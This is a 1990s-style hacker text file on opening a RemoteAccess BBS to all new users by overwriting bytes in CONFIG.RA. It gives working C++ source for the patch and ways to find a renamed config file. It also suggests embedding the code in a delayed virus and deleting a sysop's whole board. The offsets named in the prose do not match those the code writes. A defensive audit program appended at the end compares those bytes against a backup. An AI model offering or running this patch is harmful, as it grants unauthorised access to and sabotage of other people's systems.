HOW TO GIVE MAXIMUM ACCESS TO ANY NEW USER ON A REMOTEACCESS BBS. (RA v2.02)

Written by Lourens Steyn AKA 'Stalker X'

Disclaimer: I cannot be held responsible for the actions of the people who implement the knowledge in this text file. This text file is for educational purposes ONLY!

This new and improved method of hacking a RemoteAccess BBS is very effective! This hack can be used in Windows, Windows95 and DOS software and even virus code. The code is tight and compact.

This hack works by using the "SET RA=XX:\YYYY" setting in the autoexec.bat. If you need a hack that will find the CONFIG.RA without this setting you will need to do a DIR SCAN. If the sysop did rename this file then you can still find it BUT this procedure is SLOW.

So how do we locate 'CONFIG.RA' if someone renamed it? At first I didn't think it was possible BUT: Well, there is an easy way. Compare the environment variable 'RA' to the file you're scanning. Get the string with the format [Str Length]{string} at offset 0x421 in the target file. If it's the same then you can be sure it's RemoteAccess's config file. If there is no environment variable then get the string in the format [Str Length]{string}; if you can change to the directory with that name then it's the config file! And you found what you were looking for.

But let's stick to the normal way of doing things. We can access this environment variable in C++ so we know what the directory is of the 'config.ra' file. Next all we need to do is to edit the two bytes at offset 0x509 and 0x5A0 in the 'config.ra' file, set these bytes each to 0xFF. That's it! All the new users will get Maximum access to the system. In short the RA BBS will be open to all for a big party.

The RA program is so full of holes that one can sell it as cheese, BUT it's a rather good system considering it was written in PASCAL. All you really need to make sure is that this program is run on the host.
Some go even further: if some sysop isn't in their good books they use the same method of locating the RemoteAccess config file BUT they do an extra scan to check who the sysop of the BBS is. You can find the name of the sysop in the 'config.ra' file at offset 0x55E in the format of [Str Length]{string}. Some people go even as far as deleting the whole BBS if it finds the sysop! But we aren't like that are we? .. ARE WE? ..ARE WE? 8-) Naaa didn't think so.

Ok here is the C++ Source.

------>CUT
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char* DIR;
char RAC[255],ACC=0xFF;
FILE* CONFIG;

int main()
{
  /* RA directory comes from the "SET RA=" environment variable */
  if((DIR=getenv("RA"))==NULL)return 1;
  strcpy(RAC,DIR);
  strcat(RAC,"\\CONFIG.RA");
  if(!(CONFIG=fopen(RAC,"r+")))return 1;
  /* two consecutive bytes are written, starting at offset 0x509 */
  fseek(CONFIG,0x509,SEEK_SET);
  fwrite(&ACC,1,1,CONFIG);
  fwrite(&ACC,1,1,CONFIG);
  fclose(CONFIG);
  return 0;
}
------>CUT

This code would work rather nicely in a virus IF someone should ever try it. A Virus is a funny thing, it can hang around until it finds a sysop, maybe a year or so into the future, then it does its job. But we won't do something like that would we???? 8-]

That's all folks.

Remember:
"He who rules with the sword dies by it."
"He who rules with wisdom will gain it."
and "It's all in the planning."
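
For a sysop who wants to check whether a CONFIG.RA has been edited in the way described above, the following C program (an added example, not part of the original text file) compares a live copy against a known-good backup at the offsets this page names and flags any of those bytes set to 0xFF. The names audit, load and WATCH and the sample values are assumptions of this example; the offsets are taken from this page only and are not checked against RemoteAccess documentation.

```c
#include <stdio.h>
#include <string.h>

#define IMG_LEN 0x600 /* enough to cover every offset the text names */
/* Offsets as given on this page: 0x509 and 0x50A are the two bytes the
   listing writes, 0x5A0 is the second offset named in the prose. */
static const size_t WATCH[] = { 0x509, 0x50A, 0x5A0 };
#define NWATCH (sizeof WATCH / sizeof WATCH[0])

/* Sets one bit per WATCH entry: *ff when the live byte is 0xFF, *chg when it
   differs from the known-good copy. Returns -1 when an image is too short. */
int audit(const unsigned char *good, const unsigned char *live, size_t len,
          int *ff, int *chg) {
    size_t i;
    *ff = *chg = 0;
    for (i = 0; i < NWATCH; i++) {
        if (WATCH[i] >= len) return -1;
        if (live[WATCH[i]] == 0xFF) *ff |= 1 << i;
        if (live[WATCH[i]] != good[WATCH[i]]) *chg |= 1 << i;
    }
    return 0;
}

/* Reads up to IMG_LEN bytes of a file; returns the number of bytes read. */
size_t load(const char *path, unsigned char *img) {
    FILE *f = fopen(path, "rb");
    size_t n = f ? fread(img, 1, IMG_LEN, f) : 0;
    if (f) fclose(f);
    return n;
}

/* Usage: audit BACKUP LIVE. With no arguments it runs on a constructed sample. */
int main(int argc, char **argv) {
    static unsigned char good[IMG_LEN], live[IMG_LEN];
    size_t a = IMG_LEN, b = IMG_LEN;
    int ff, chg;
    if (argc == 3) {
        a = load(argv[1], good);
        b = load(argv[2], live);
    } else {
        good[0x509] = good[0x50A] = good[0x5A0] = 10; /* constructed values */
        memcpy(live, good, IMG_LEN);
        live[0x509] = live[0x50A] = 0xFF; /* constructed: simulated edit */
    }
    if (audit(good, live, a < b ? a : b, &ff, &chg) < 0) return 2;
    printf("0xFF bytes: mask %d, changed since backup: mask %d\n", ff, chg);
    return ff || chg;
}
```

The exit status is non-zero when any watched byte is 0xFF or differs from the backup, so the check can run from a nightly batch file against a copy of CONFIG.RA kept on read-only media.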